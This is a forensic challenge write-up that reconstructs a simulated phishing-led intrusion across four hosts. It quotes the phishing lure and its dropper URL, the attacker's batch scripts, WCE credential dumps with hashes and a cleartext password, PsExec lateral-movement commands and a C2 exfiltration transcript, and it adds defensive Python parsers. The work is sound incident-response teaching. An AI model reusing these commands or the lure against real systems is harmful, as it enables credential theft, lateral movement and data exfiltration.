ulilclown@gmail.com/@alwaysreit
infoseckitten@gmail.com/@infoseckitten
hack3rsaurus@gmail.com/@magicked
First, thanks to @jackcr for this amazing challenge. Aspiring forensic analysts should take note of the real world scenario. You can download the challenge here: https://t.co/Rfx8Iw7j
This forensic challenge consisted of 4 hosts. First we will post the basic information on each host before diving into the documentation. Note: There is a TON of data in this writeup; we tried to make it as readable as possible.
Note: We tried to match some artifacts discovered in memory with their counterparts in the file listing. The issue is that you never know exactly which command was run at a specific time (e.g. net.exe is thrown into prefetch, but you cannot tell whether it was a net use, net view, net share command, etc.).
Challenge Questions
Like our other write-up for @jackcr’s first forensic challenge, we will start with the answers to the questions.
1. Who delivered the attack?
From: "Security Department" <isd@petro-markets.info>
2. Who was the attack delivered to?
<amirs@petro-market.org>, <callb@petro-market.org>, <wrightd@petro-market.org>
3. What time was the attack delivered?
26 Nov 2012 14:59:38
4. What time was the attack executed?
2012-11-26 23:01:54
5. What is the C2 ip Address?
58.64.132.141
6. What is the name of the dropper?
Symantec-1.43-1.exe
7. What is the name of the backdoor?
c:/WINDOWS/system32/6to4ex.dll
8. What is the process name the backdoor is running in?
svchost.exe (6to4ex.dll)
9. What is the process id on all the machines the backdoor is installed on?
1024
10. What usernames were used in this attack?
petro1-market\callb , sysbackup
11. What level of access did the attacker have?
Admins (sysbackup)
12. How was lateral movement performed?
Through psexec (ps.exe)
13. What .bat scripts were placed on the machines?
system[1-6].bat
14. What are the contents of each .bat script?
system1.bat
@echo off
mkdir c:\windows\webui
net share z=c:\windows\webui /GRANT:sysbackup,FULL
ipconfig /all >> c:\windows\webui\system.dll
net share >> c:\windows\webui\system.dll
net start >> c:\windows\webui\system.dll
net view >> c:\windows\webui\system.dll
system2.bat
@echo off
c:\windows\webui\gs.exe -a >> c:\windows\webui\svchost.dll
system3.bat
@echo off
dir /S C:\*.dwg > c:\windows\webui\https.dll
system4.bat
@echo off
c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll
"C:\Engineering\Designs\Pumps" -x*.dll
system5.bat
@echo off
copy c:\windows\webui\wc.exe c:\windows\system32
at 19:30 wc.exe -e -o h.out
system6.bat
@echo off
ipconfig /all >> c:\windows\webui\system.dll
net share >> c:\windows\webui\system.dll
net start >> c:\windows\webui\system.dll
net view >> c:\windows\webui\system.dll
15. What other tools were placed on the machines by the attacker?
Windows Credentials Editor (WCE)
PsExec
16. What directory was used by the attacker to drop tools?
C:\windows\webui\
17. Was the directory newly created or was it there prior to the attack?
Created during the attack
From the PCAP:
mkdir webui
mkdir webui
C:\WINDOWS>
cd webui
cd webui
C:\WINDOWS\webui>
18. What were the names of the exfiltrated files?
netuse.dll,system.dll, netstat.dll, https.dll, svchost.dll
19. What did the exfiltrated files contain?
netstat.dll (from IIS-SARIYADH-03):
rar containing pump[1-100].dwg (these files contain nothing, just zeroes)
netuse.dll (from ENG-USTXHOU-148):
net view
net localgroup administrators
net sessions
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254
net share
net start
system.dll (from ENG-USTXHOU-148):
ipconfig /all
net share
net start
net view
https.dll (from ENG-USTXHOU-148):
dir /S C:\*.dwg
svchost.dll (from ENG-USTXHOU-148):
c:\windows\webui\gs.exe -a
20. What time did winrar run?
Nov 27 2012 01:11:19
21. What is the md5sum of pump1.dwg?
a48266248c04b2ba733238a480690a1c
22. Which machines were compromised and need to be remediated?
- ENG-USTXHOU-148
- FLD-SARIYADH-43
- IIS-SARIYADH-03
23. Which user accounts were compromised and need to be remediated?
- callb
- amirs, Note: this system was compromised, but the credentials may not have been dumped.
- sysbackup
- all dumped hashes from svchost.dll
24. Are there additional machines that need to be analyzed?
No
25. Describe how each machine was involved in this incident and overall what happened.
See below.
Basic System Info
To get the IP and host information we used a combination of two Volatility commands against each memdump:
$vol.py -f memdump.bin imageinfo
and then used the suggested profile to list the active connections:
$vol.py -f memdump.bin connections --profile=WinXPSP2x86
ENG-USTXHOU-148 = 172.16.150.20
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/ENG-USTXHOU-148/memdump.bin)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x8054cde0
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000
KUSER_SHARED_DATA : 0xffdf0000
Image date and time : 2012-11-27 01:57:28 UTC+0000
Image local date and time : 2012-11-26 19:57:28 -0600
FLD-SARIYADH-43 = 172.16.223.187
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/FLD-SARIYADH-43/memdump.bin)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x8054cde0
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000
KUSER_SHARED_DATA : 0xffdf0000
Image date and time : 2012-11-27 01:46:00 UTC+0000
Image local date and time : 2012-11-27 04:46:00 +0300
IIS-SARIYADH-03 = 172.16.223.47
Suggested Profile(s) : Win2003SP0x86, Win2003SP1x86, Win2003SP2x86 (Instantiated with Win2003SP0x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/IIS-SARIYADH-03/memdump.bin)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x805583d0
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xffdff000
KUSER_SHARED_DATA : 0xffdf0000
Image date and time : 2012-11-27 01:52:37 UTC+0000
Image local date and time : 2012-11-27 04:52:37 +0300
DC-USTXHOU = 172.16.150.10
Suggested Profile(s) : Win2003SP0x86, Win2003SP1x86, Win2003SP2x86 (Instantiated with Win2003SP0x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/DC-USTXHOU/memdump.bin)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x805583d0
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xffdff000
KUSER_SHARED_DATA : 0xffdf0000
Image date and time : 2012-11-27 02:01:57 UTC+0000
Image local date and time : 2012-11-26 20:01:57 -0600
Initial Vector - Phish
The initial vector is seen in memory below.
Relevant information is highlighted.
Received: from d0793h (d0793h.petro-markets.info [58.64.132.141])
by ubuntu-router (8.14.3/8.14.3/Debian-9.2ubuntu1) with SMTP id qAQK06Co005842;
Mon, 26 Nov 2012 15:00:07 -0500
Message-ID:
From: "Security Department"
To: , ,
Subject: Immediate Action
Date: Mon, 26 Nov 2012 14:59:38 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0015_01CDCBE6.A7B92DE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.5512
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
Return-Path: isd@petro-markets.info
X-OriginalArrivalTime: 26 Nov 2012 20:00:08.0432 (UTC) FILETIME=[A2ABBF00:01CDCC10]
This is a multi-part message in MIME format.
------=_NextPart_000_0015_01CDCBE6.A7B92DE0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Attn: Immediate Action is Required!!
The IS department is requiring that all associates update to the new =
version of anti-virus. This is critical and must be done ASAP! Failure =
to update anti-virus may result in negative actions.
Please download the new anti-virus and follow the instructions. Failure =
to install this anti-virus may result in loosing your job!
Please donwload at http://58.64.132.8/download/Symantec-1.43-1.exe
Regards,
The IS Department
Users Download Phishes
ENG-USTXHOU-148 - User callb downloads (saved on the drive as Symantec-1.43-1[1].exe):
FLD-SARIYADH-43 - User amirs downloads (saved on the drive as Symantec-1.43-1[2].exe)
Visited: callb@http://58.64.132.8/download/Symantec-1.43-1.exe
http://58.64.132.8/download/Symantec-1.43-1.exe
Symantec-1.43-1[1].exe
HTTP/1.1 200 OK
ETag: "21628-1b667-4cf2b68a20f60"
Content-Length: 112231
Keep-Alive: timeout=15, max=100
Content-Type: application/x-msdos-program
~U:callb
FLD-SARIYADH-43 - User amirs downloads (saved on the drive as Symantec-1.43-1[2].exe):
HTTP/1.1 200 OK
ETag: "21628-1b667-4cf2b68a20f60"
Content-Length: 112231
Keep-Alive: timeout=15, max=100
Content-Type: application/x-msdos-program
~U:amirs
URL http://58.64.132.8/download/Symantec-1.43-1.exe
Symantec-1.43-1[2].exe
HTTP/1.1 200 OK
ETag: "21628-1b667-4cf2b68a20f60"
Content-Length: 112231
Keep-Alive: timeout=15, max=100
Content-Type: application/x-msdos-program
Pwnage Begins
2012-11-26 23:01:54 - ENG-USTXHOU-148 - SYMANTEC-1.43-1[2].EXE-3793B625.pf is executed and 6to4ex.dll is created
Mon Nov 26 2012 23:01:54
22428 macb r/rrwxrwxrwx 0 0
11722-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-3793B625.pf
...snip...
100895 .ac. r/rr-xr-xr-x 0 0 8610-128-4 c:/WINDOWS/system32/6to4ex.dll
Using Volatility's dlllist you can see that 6to4ex.dll is loaded in PID 1024 (svchost.exe):
$vol.py -f memdump.bin dlllist -p 1024
Volatile Systems Volatility Framework 2.2
************************************************************************
svchost.exe pid: 1024
Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs
Service Pack 3
..snip....
0x72ae0000 0x13000 C:\WINDOWS\System32\RASQEC.DLL
0x768d0000 0xa4000 C:\WINDOWS\System32\RASDLG.dll
0x77b40000 0x22000 C:\WINDOWS\system32\Apphelp.dll
0x50640000 0xc000 C:\WINDOWS\system32\wups.dll
0x5f740000 0xe000 C:\WINDOWS\System32\wbem\ncprov.dll
0x10000000 0x1c000 c:\windows\system32\6to4ex.dll
0x73b80000 0x12000 c:\windows\system32\AVICAP32.dll
More work could be done to extract this binary and dig through it; however, much of this will be covered in a later section of the writeup.
2012-11-26 23:03:10 - ENG-USTXHOU-148 - webui directory is born
Mon Nov 26 2012 23:03:10 56 ...b d/drwxrwxrwx 0 0 7556-144-5 c:/WINDOWS/webui
Decrypted PCAP - webui directory is born and entered
C:\WINDOWS\system32>
cd ..
cd ..
C:\WINDOWS>
mkdir webui
mkdir webui
C:\WINDOWS>
cd webui
cd webui
C:\WINDOWS\webui>
2012-11-26 23:03:21 - ENG-USTXHOU-148 - ipconfig is being run
Mon Nov 26 2012 23:03:21 26602 ...b r/rrwxrwxrwx 0 0 11706-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf
55808 .a.. r/rrwxrwxrwx 0 0 24145-128-3 c:/WINDOWS/system32/ipconfig.exe
Decrypted PCAP - ipconfig is run and the information is echoed back
C:\WINDOWS\webui>
ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.150.20
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.150.2
C:\WINDOWS\webui>
2012-11-26 23:06:34 - ENG-USTXHOU-148 - ps.exe, gs.exe, ra.exe, sl.exe and wc.exe are all dropped on the system
Mon Nov 26 2012 23:06:34 381816 ...b r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
56 m.c. d/drwxrwxrwx 0 0 28-144-6 c:/WINDOWS
Mon Nov 26 2012 23:06:35 381816 m.c. r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
Mon Nov 26 2012 23:06:47 303104 ...b r/rrwxrwxrwx 0 0 11719-128-3 c:/WINDOWS/webui/gs.exe
Mon Nov 26 2012 23:06:48 303104 mac. r/rrwxrwxrwx 0 0 11719-128-3 c:/WINDOWS/webui/gs.exe
Mon Nov 26 2012 23:06:52 403968 macb r/rrwxrwxrwx 0 0 11723-128-3 c:/WINDOWS/webui/ra.exe
Mon Nov 26 2012 23:06:56 20480 macb r/rrwxrwxrwx 0 0 11724-128-3 c:/WINDOWS/webui/sl.exe
Mon Nov 26 2012 23:06:59 208384 m.cb r/rrwxrwxrwx 0 0 11725-128-3 c:/WINDOWS/webui/wc.exe
208384 m... r/rrwxrwxrwx 0 0 11739-128-3 c:/WINDOWS/system32/wc.exe
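The timeline entries above are mactime (Sleuth Kit) output, where entries that share a timestamp print the date only once and the following lines inherit it. The added example below is our own illustration, not code from the original writeup or from Volatility/Sleuth Kit: it parses such lines, carries the inherited timestamp across the un-dated continuation lines, and pulls out the born ("b") executables and the first-run prefetch entries; the sample lines are copied from this section.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional, Tuple
import os

# Sample timeline lines copied from the ENG-USTXHOU-148 entries above; the
# un-dated lines inherit the timestamp of the line before them (mactime style).
SAMPLE = """\
Mon Nov 26 2012 23:06:34 381816 ...b r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
56 m.c. d/drwxrwxrwx 0 0 28-144-6 c:/WINDOWS
Mon Nov 26 2012 23:06:35 381816 m.c. r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
Mon Nov 26 2012 23:06:47 303104 ...b r/rrwxrwxrwx 0 0 11719-128-3 c:/WINDOWS/webui/gs.exe
Mon Nov 26 2012 23:06:48 303104 mac. r/rrwxrwxrwx 0 0 11719-128-3 c:/WINDOWS/webui/gs.exe
Mon Nov 26 2012 23:06:52 403968 macb r/rrwxrwxrwx 0 0 11723-128-3 c:/WINDOWS/webui/ra.exe
Mon Nov 26 2012 23:06:56 20480 macb r/rrwxrwxrwx 0 0 11724-128-3 c:/WINDOWS/webui/sl.exe
Mon Nov 26 2012 23:06:59 208384 m.cb r/rrwxrwxrwx 0 0 11725-128-3 c:/WINDOWS/webui/wc.exe
208384 m... r/rrwxrwxrwx 0 0 11739-128-3 c:/WINDOWS/system32/wc.exe
Mon Nov 26 2012 23:07:53 14394 ...b r/rrwxrwxrwx 0 0 11727-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf
Mon Nov 26 2012 23:10:35 6768 ...b r/rrwxrwxrwx 0 0 11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
"""

WEEKDAYS = {"Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"}


@dataclass
class Event:
    when: datetime
    size: int
    macb: str   # four columns: m=modified, a=accessed, c=changed, b=born; '.' = not set
    perms: str
    meta: str   # MFT entry reference, e.g. 11710-128-3
    path: str

    def has(self, flag: str) -> bool:
        return flag in self.macb


def parse_mactime(text: str) -> List[Event]:
    """Parse mactime output, carrying the timestamp over un-dated continuation lines."""
    events: List[Event] = []
    current: Optional[datetime] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("..."):       # blank line or a "...snip..." marker
            continue
        tok = line.split()
        if tok[0] in WEEKDAYS:                       # dated line: "Mon Nov 26 2012 23:06:34"
            current = datetime.strptime(" ".join(tok[:5]), "%a %b %d %Y %H:%M:%S")
            tok = tok[5:]
        if current is None:
            raise ValueError(f"continuation line before any dated line: {line}")
        size, macb, perms, _uid, _gid, meta = tok[:6]
        events.append(Event(current, int(size), macb, perms, meta, " ".join(tok[6:])))
    return events


def born_executables(events: List[Event]) -> List[str]:
    """Paths of .exe files whose 'b' (born) column is set: new tools landing on disk."""
    return [e.path for e in events if e.has("b") and e.path.lower().endswith(".exe")]


def first_runs(events: List[Event]) -> List[Tuple[str, str]]:
    """(timestamp, program) for newly born prefetch files, i.e. a program's first execution."""
    out = []
    for e in events:
        name = os.path.basename(e.path)
        if e.has("b") and "/prefetch/" in e.path.lower() and name.upper().endswith(".PF"):
            # NAME.EXE-<hash>.pf -> NAME.EXE
            out.append((e.when.strftime("%Y-%m-%d %H:%M:%S"), name.rsplit("-", 1)[0]))
    return out


if __name__ == "__main__":
    evs = parse_mactime(SAMPLE)
    for p in born_executables(evs):
        print("born:", p)
    for when, prog in first_runs(evs):
        print("first run:", when, prog)
```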
ENG-USTXHOU-148 - The attacker runs the dir command; remember this output so you can compare it with other copies you might find in memory.
908460- Volume in drive C has no label.
908461- Volume Serial Number is 1044-534A
908462- Directory of C:\WINDOWS\webui
908463-11/26/2012 05:07 PM <DIR> .
908464-11/26/2012 05:07 PM <DIR> ..
908465-11/26/2012 05:06 PM 303,104 gs.exe
908466-11/26/2012 05:11 PM 11,844 netuse.dll
908467-11/26/2012 05:06 PM 403,968 ra.exe
908468:11/26/2012 05:06 PM 20,480 sl.exe
908469-11/26/2012 05:06 PM 208,384 wc.exe
908470- 5 File(s) 947,780 bytes
908471- 2 Dir(s) 7,005,007,872 bytes free
908472-C:\WINDOWS\webui>
2012-11-26 23:07:53 - ENG-USTXHOU-148 - Net is thrown into prefetch (some work will be needed to try and match that up with a net command found in memory)
Mon Nov 26 2012 23:07:53 14394 ...b r/rrwxrwxrwx 0 0 11727-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf
Decrypted PCAP - net commands are being used and the results are fed into netuse.dll
C:\WINDOWS\webui>
net view >> netuse.dll
net view >> netuse.dll
C:\WINDOWS\webui>
net localgroup administrators >> netuse.dll
net localgroup administrators >> netuse.dll
C:\WINDOWS\webui>
net sessions >> netuse.dll
net sessions >> netuse.dll
C:\WINDOWS\webui>
net share >> netuse.dll
net share >> netuse.dll
C:\WINDOWS\webui>
net start >> netuse.dll
net start >> netuse.dll
2012-11-26 23:10:35 - ENG-USTXHOU-148 - SL.EXE is thrown into prefetch
Mon Nov 26 2012 23:10:35 6768 ...b r/rrwxrwxrwx 0 0 11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
Decrypted PCAP - sl (ScanLine) is being used to find hosts on 172.16.150.0/24 with open ports 445 (Windows SMB), 80 (web), 443 (HTTPS), 21 (FTP) and 1433 (SQL)
C:\WINDOWS\webui>
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254 >> netuse.dll
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254 >> netuse.dll
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
5 IPs and 25 ports scanned in 0 hours 0 mins 13.11 secs
2012-11-26 23:11:33 - ENG-USTXHOU-148 - SL.EXE is thrown into prefetch again
Mon Nov 26 2012 23:11:33 6768 mac. r/rrwxrwxrwx 0 0 11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
Decrypted PCAP - sl (ScanLine) is used again to find hosts on 172.16.150.0/24 with open ports 445 (Windows SMB), 80 (web), 443 (HTTPS), 21 (FTP) and 1433 (SQL), and the results are dumped into netuse.dll
C:\WINDOWS\webui>
sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 >> netuse.dll
sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 >> netuse.dll
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
5 IPs and 25 ports scanned in 0 hours 0 mins 13.08 secs
2012-11-26 23:11:58 - ENG-USTXHOU-148 - GS.EXE is thrown into prefetch and netuse.dll is created.
Mon Nov 26 2012 23:11:58 11844 mac. r/rrwxrwxrwx 0 0 11726-128-3 c:/WINDOWS/webui/netuse.dll
10002 macb r/rrwxrwxrwx 0 0 11730-128-4 c:/WINDOWS/Prefetch/GS.EXE-3796DDD9.pf
415744 .a.. r/rrwxrwxrwx 0 0 23392-128-3 c:/WINDOWS/system32/samsrv.dll
33280 .a.. r/rrwxrwxrwx 0 0 24343-128-3 c:/WINDOWS/system32/cryptdll.dll
Decrypted PCAP - gs -a is run and results are stored in netuse.dll
C:\WINDOWS\webui>
gs -a >> netuse.dll
gs -a >> netuse.dll
0043B820
ENG-USTXHOU-148 - The attacker runs a “dir” command
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 07:01 PM <DIR> .
11/26/2012 07:01 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 07:00 PM 5,282 https.dll
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 06:56 PM 1,230 svchost.dll
11/26/2012 06:44 PM 5,711 system.dll
11/26/2012 05:06 PM 208,384 wc.exe
8 File(s) 960,003 bytes
2 Dir(s) 7,004,917,760 bytes free
C:\WINDOWS\webui>
Decrypted PCAP - Several dir commands are run and netuse.dll is exfiltrated.
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6680 NTFS Local Disk
D 539 0 CDFS CD Drive
COMMAND: LIST FILES (C:\)
...snip...
COMMAND: LIST FILES (C:\WINDOWS\)
...snip...
COMMAND: LIST FILES (C:\WINDOWS\webui\)
...snip...
COMMAND: DOWN FILES (C:\WINDOWS\webui\netuse.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\netuse.dll: 11844)
COMMAND: CONTINUE
TOKEN: FILE DATA (8183)
COMMAND: CONTINUE
TOKEN: FILE DATA (3661)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
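The COMMAND/TOKEN lines above are the backdoor's file-transfer dialogue: a DOWN FILES request, a FILE SIZE announcement, FILE DATA chunks and a TRANSFER FINISH. The added example below is our own illustration, not code from the writeup: it rebuilds each transfer from a decrypted transcript and checks that the chunks add up to the announced size, which is how you confirm what actually left the network. The first two transfers are copied from this writeup; the third is constructed to show an unfinished one.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample transcript: the netuse.dll and system.dll exchanges are copied
# from the decrypted PCAP excerpts in this writeup; the https.dll exchange is made up
# to show a transfer that never finished (no TRANSFER FINISH, fewer bytes than announced).
SAMPLE = """\
COMMAND: LIST FILES (C:\\WINDOWS\\webui\\)
...snip...
COMMAND: DOWN FILES (C:\\WINDOWS\\webui\\netuse.dll)
TOKEN: FILE SIZE (C:\\WINDOWS\\webui\\netuse.dll: 11844)
COMMAND: CONTINUE
TOKEN: FILE DATA (8183)
COMMAND: CONTINUE
TOKEN: FILE DATA (3661)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
COMMAND: DOWN FILES (C:\\WINDOWS\\webui\\system.dll)
TOKEN: FILE SIZE (C:\\WINDOWS\\webui\\system.dll: 5711)
COMMAND: CONTINUE
TOKEN: FILE DATA (5711)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
COMMAND: DOWN FILES (C:\\WINDOWS\\webui\\https.dll)
TOKEN: FILE SIZE (C:\\WINDOWS\\webui\\https.dll: 5282)
COMMAND: CONTINUE
TOKEN: FILE DATA (4096)
"""

DOWN = re.compile(r"^COMMAND: DOWN FILES \((.+)\)$")
SIZE = re.compile(r"^TOKEN: FILE SIZE \((.+): (\d+)\)$")
DATA = re.compile(r"^TOKEN: FILE DATA \((\d+)\)$")
FINISH = "TOKEN: TRANSFER FINISH"


@dataclass
class Transfer:
    path: str
    declared: Optional[int] = None          # size announced by the victim side
    chunks: List[int] = field(default_factory=list)
    finished: bool = False

    @property
    def received(self) -> int:
        return sum(self.chunks)

    @property
    def complete(self) -> bool:
        return self.finished and self.declared is not None and self.received == self.declared


def reconstruct_transfers(text: str) -> List[Transfer]:
    """Walk the decrypted C2 transcript and rebuild each DOWN FILES exchange."""
    transfers: List[Transfer] = []
    cur: Optional[Transfer] = None
    for raw in text.splitlines():
        line = raw.strip()
        if m := DOWN.match(line):
            cur = Transfer(path=m.group(1))
            transfers.append(cur)
        elif cur is None:
            continue                          # outside a download: directory listings etc.
        elif m := SIZE.match(line):
            if m.group(1) != cur.path:
                raise ValueError(f"FILE SIZE for {m.group(1)} while downloading {cur.path}")
            cur.declared = int(m.group(2))
        elif m := DATA.match(line):
            cur.chunks.append(int(m.group(1)))
        elif line == FINISH:
            cur.finished = True
            cur = None
    return transfers


def exfil_report(text: str) -> List[Tuple[str, Optional[int], int, bool]]:
    """(path, declared bytes, received bytes, complete?) for every file pulled by the C2."""
    return [(t.path, t.declared, t.received, t.complete) for t in reconstruct_transfers(text)]


if __name__ == "__main__":
    for row in exfil_report(SAMPLE):
        print(row)
```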
2012-11-26 23:16:14 - ENG-USTXHOU-148 - Ping is thrown into prefetch
Mon Nov 26 2012 23:15:44 13296 ...b r/rrwxrwxrwx 0 0 11731-128-4 c:/WINDOWS/Prefetch/PING.EXE-31216D26.pf
Mon Nov 26 2012 23:16:14 13296 mac. r/rrwxrwxrwx 0 0 11731-128-4 c:/WINDOWS/Prefetch/PING.EXE-31216D26.pf
Decrypted PCAP - Pings are made out to DC-USTXHOU and IIS-SARIYADH-03 and a dir command is also run
ping DC-USTXHOU
ping DC-USTXHOU
Pinging dc-ustxhou.petro-market.org [172.16.150.10] with 32 bytes of data:
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.150.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\WINDOWS\webui>
ping IIS-SARIYADH-03
ping IIS-SARIYADH-03
Pinging IIS-SARIYADH-03.petro-market.org [172.16.223.47] with 32 bytes of data:
Reply from 172.16.223.47: bytes=32 time=2ms TTL=127
Reply from 172.16.223.47: bytes=32 time=1ms TTL=127
Reply from 172.16.223.47: bytes=32 time=1ms TTL=127
Reply from 172.16.223.47: bytes=32 time<1ms TTL=127
Ping statistics for 172.16.223.47:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 2ms, Average = 1ms
C:\WINDOWS\webui>
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 05:07 PM <DIR> .
11/26/2012 05:07 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 05:06 PM 208,384 wc.exe
5 File(s) 947,780 bytes
2 Dir(s) 7,005,007,872 bytes free
C:\WINDOWS\webui>
2012-11-26 23:58:51 - ENG-USTXHOU-148 - WC.EXE is thrown into prefetch
Mon Nov 26 2012 23:58:51 13208 ...b r/rrwxrwxrwx 0 0 11732-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
Decrypted PCAP - wc.exe -l and wc.exe -w are used
C:\WINDOWS\webui>
wc.exe -l
wc.exe -l
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb:PETRO-MARKET:115B24322C11908C85140F5D33B6232F:40D1D232D5F731EA966913EA458A16E7
ENG-USTXHOU-148$:PETRO-MARKET:00000000000000000000000000000000:D6717F1E5252FA87ED40AF8C46D8B1E2
C:\WINDOWS\webui>
wc.exe -w
wc.exe -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb\PETRO-MARKET:Mar1ners@4655
NETWORK
SERVICE\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c
$-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
ENG-USTXHOU-148$\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c
$-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
2012-11-27 00:00:57 - ENG-USTXHOU-148 - PS.EXE is thrown into prefetch
Tue Nov 27 2012 00:00:57 12542 ...b r/rrwxrwxrwx 0 0 11733-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf
Decrypted PCAP - psexec is used with the callb credentials (using the cleartext password)
C:\WINDOWS\webui>
ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.150.10... Couldn't access 172.16.150.10:
Connecting to 172.16.150.10..
2012-11-27 00:05:48 - IIS-SARIYADH-03 - PSEXESVC.EXE (the PsExec service) is born on the system
Tue Nov 27 2012 00:05:48 181064 macb r/rrwxrwxrwx 0 0 10784-128-3 c:/WINDOWS/PSEXESVC.EXE
2012-11-27 00:07:03 - ENG-USTXHOU-148 - ps is accessed
Tue Nov 27 2012 00:07:03 381816 .a.. r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
Decrypted PCAP - psexec is used with the callb credentials (using the cleartext password)
C:\WINDOWS\webui>
ps \\172.16.223.47 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
ps \\172.16.223.47 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.223.47... Couldn't access 172.16.223.47:
Connecting to 172.16.223.47...
